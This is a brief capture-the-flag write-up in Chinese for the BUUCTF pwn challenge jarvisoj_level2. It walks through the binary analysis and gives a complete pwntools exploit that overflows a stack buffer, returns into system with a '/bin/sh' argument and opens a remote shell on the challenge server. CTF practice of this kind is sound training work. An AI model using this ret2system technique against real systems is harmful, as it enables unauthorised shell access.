[BUUCTF-pwn]——jarvisoj_level2
作者:互联网
[BUUCTF-pwn]——jarvisoj_level2
checksec 一下下, 32程序
IDA中看下,发现了system函数还是两个,有可利用的栈溢出read函数,shift+F12,还发现了"/bin/sh"字符串. 所以exploit就如下
exploit
from pwn import *
p = remote("node3.buuoj.cn",28375)
binsh = 0x0804A024
sys_addr = 0x0804845C
payload = 'a' * (0x88 + 0x4) + p32(sys_addr) + p32(binsh)
p.sendlineafter("Input:\n",payload)
p.interactive()
标签:binsh,cn,buuoj,jarvisoj,level2,pwn 来源: https://blog.csdn.net/Y_peak/article/details/113784704